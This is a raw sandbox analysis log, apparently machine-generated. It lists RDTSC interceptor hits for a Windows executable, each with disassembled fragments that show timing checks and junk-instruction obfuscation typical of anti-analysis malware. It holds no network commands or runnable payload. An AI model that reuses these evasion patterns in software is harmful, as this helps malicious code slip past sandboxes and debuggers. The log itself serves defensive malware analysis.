                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD7983 second address: DD7987 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD7987 second address: DD798D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD6A77 second address: DD6B26 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2A2C619156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007F2A2C619158h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f add ebx, dword ptr [ebp+122D1E24h] 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c xor di, 8FF9h 0x00000041 mov eax, dword ptr [ebp+122D03F9h] 0x00000047 xor ebx, dword ptr [ebp+122D2AFFh] 0x0000004d push FFFFFFFFh 0x0000004f jnp 00007F2A2C61915Ah 0x00000055 mov bx, 6542h 0x00000059 nop 0x0000005a pushad 0x0000005b pushad 0x0000005c jnc 00007F2A2C619156h 0x00000062 jmp 00007F2A2C619169h 0x00000067 popad 0x00000068 jmp 00007F2A2C61915Ah 0x0000006d popad 0x0000006e push eax 0x0000006f pushad 0x00000070 jmp 00007F2A2C619167h 0x00000075 push eax 0x00000076 push edx 0x00000077 push eax 0x00000078 pop eax 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD8A42 second address: DD8A46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD8A46 second address: DD8A4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD7C2D second address: DD7C33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD7C33 second address: DD7C37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD8AE4 second address: DD8AE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD9A5D second address: DD9A6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F2A2C61915Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD9A6E second address: DD9A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DDCB7F second address: DDCBE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2C619169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp], eax 0x0000000d add bh, 00000061h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F2A2C619158h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c mov di, si 0x0000002f sub ebx, dword ptr [ebp+122D2C53h] 0x00000035 push 00000000h 0x00000037 mov ebx, esi 0x00000039 xchg eax, esi 0x0000003a jnp 00007F2A2C61915Eh 0x00000040 push esi 0x00000041 js 00007F2A2C619156h 0x00000047 pop esi 0x00000048 push eax 0x00000049 push eax 0x0000004a push ecx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DDAC0D second address: DDAC11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DDAC11 second address: DDAC15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DDAC15 second address: DDAC23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F2A2CEBE356h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DDAC23 second address: DDAC30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DDAC30 second address: DDAC34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DDAC34 second address: DDAC38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DDE968 second address: DDE994 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2A2CEBE356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F2A2CEBE358h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 push esi 0x00000016 jmp 00007F2A2CEBE362h 0x0000001b pop esi 0x0000001c push edi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DDCD44 second address: DDCD48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DDCD48 second address: DDCD4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DDCD4E second address: DDCD6E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2A2C619164h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DDEBFF second address: DDEC03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DE2466 second address: DE246A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DE246A second address: DE249B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2A2CEBE356h 0x00000008 jmp 00007F2A2CEBE35Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F2A2CEBE363h 0x00000014 push eax 0x00000015 push edx 0x00000016 je 00007F2A2CEBE356h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DE249B second address: DE24B8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F2A2C61915Eh 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jp 00007F2A2C619156h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DE24B8 second address: DE24CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE35Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DE24CA second address: DE24E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2A2C619161h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jne 00007F2A2C619156h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D7DE25 second address: D7DE29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D7DE29 second address: D7DE61 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F2A2C61915Ch 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F2A2C619167h 0x00000014 push ebx 0x00000015 jmp 00007F2A2C61915Ah 0x0000001a pop ebx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D7DE61 second address: D7DE6F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F2A2CEBE356h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D8B363 second address: D8B36B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D8B36B second address: D8B373 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D8B373 second address: D8B377 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DE945B second address: DE945F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DE945F second address: DE946E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jo 00007F2A2C619156h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DE946E second address: DE94A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnc 00007F2A2CEBE36Eh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f jl 00007F2A2CEBE356h 0x00000015 pop ebx 0x00000016 push ebx 0x00000017 ja 00007F2A2CEBE356h 0x0000001d pop ebx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D8CDF0 second address: D8CDF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D8CDF4 second address: D8CE0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE362h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DF2AA8 second address: DF2AB4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2A2C619156h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DF2AB4 second address: DF2ABB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DF2ABB second address: DF2AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DF2AC6 second address: DF2ACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DF3484 second address: DF348E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2A2C619156h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DF35EA second address: DF35F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DF38E3 second address: DF38F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2C61915Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DF38F1 second address: DF38F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DF3BD6 second address: DF3C01 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2A2C619172h 0x00000008 jbe 00007F2A2C619156h 0x0000000e jmp 00007F2A2C619166h 0x00000013 pushad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DF8718 second address: DF8755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jbe 00007F2A2CEBE356h 0x0000000c jc 00007F2A2CEBE356h 0x00000012 jmp 00007F2A2CEBE360h 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007F2A2CEBE363h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DF8755 second address: DF8763 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F2A2C61916Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DF8763 second address: DF8775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A2CEBE35Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DF8775 second address: DF877A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D812EF second address: D812FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F2A2CEBE356h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D812FC second address: D81302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DFBF6A second address: DFBF9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F2A2CEBE366h 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F2A2CEBE364h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E016D6 second address: E016E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F2A2C619156h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E002F7 second address: E00315 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2A2CEBE35Ch 0x0000000b pushad 0x0000000c push ebx 0x0000000d jnp 00007F2A2CEBE356h 0x00000013 pop ebx 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E00605 second address: E00616 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F2A2C61915Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E00616 second address: E00634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2A2CEBE367h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E00943 second address: E00970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F2A2C61915Bh 0x0000000d jmp 00007F2A2C619169h 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E00970 second address: E00985 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE360h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E00ADE second address: E00B0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2C619166h 0x00000007 jmp 00007F2A2C61915Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E00B0B second address: E00B0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E00B0F second address: E00B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F2A2C619156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E00021 second address: E00034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d jng 00007F2A2CEBE356h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E00E2C second address: E00E30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E00E30 second address: E00E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E00F96 second address: E00FBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A2C619165h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop eax 0x00000010 jnp 00007F2A2C61915Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E00FBE second address: E00FDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F2A2CEBE377h 0x0000000b jmp 00007F2A2CEBE35Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E00FDC second address: E00FE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E01436 second address: E0143A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E05D23 second address: E05D27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E05D27 second address: E05D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E04B69 second address: E04B84 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2A2C619156h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2A2C61915Dh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC571A second address: DC573B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2A2CEBE35Ch 0x00000008 je 00007F2A2CEBE356h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F2A2CEBE35Eh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC573B second address: DC5740 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC5CB9 second address: DC5D22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE365h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 64B3098Bh 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F2A2CEBE358h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a push esi 0x0000002b cld 0x0000002c pop edi 0x0000002d jnc 00007F2A2CEBE36Ch 0x00000033 push A0E6DC16h 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b push eax 0x0000003c pop eax 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC5D22 second address: DC5D27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC5D27 second address: DC5D2C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC6888 second address: DC68A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2C619168h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC699A second address: DC6A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jne 00007F2A2CEBE36Bh 0x0000000d popad 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F2A2CEBE358h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 lea eax, dword ptr [ebp+124813C7h] 0x0000002f and cx, 1D60h 0x00000034 nop 0x00000035 jmp 00007F2A2CEBE368h 0x0000003a push eax 0x0000003b jmp 00007F2A2CEBE362h 0x00000040 nop 0x00000041 mov di, 2316h 0x00000045 lea eax, dword ptr [ebp+12481383h] 0x0000004b clc 0x0000004c push eax 0x0000004d pushad 0x0000004e push ecx 0x0000004f jne 00007F2A2CEBE356h 0x00000055 pop ecx 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC6A33 second address: DB0204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F2A2C619158h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 call dword ptr [ebp+122D1CF3h] 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c jl 00007F2A2C619156h 0x00000032 jmp 00007F2A2C619163h 0x00000037 jne 00007F2A2C619156h 0x0000003d popad 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB0204 second address: DB020A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DB020A second address: DB020E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E04E98 second address: E04E9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
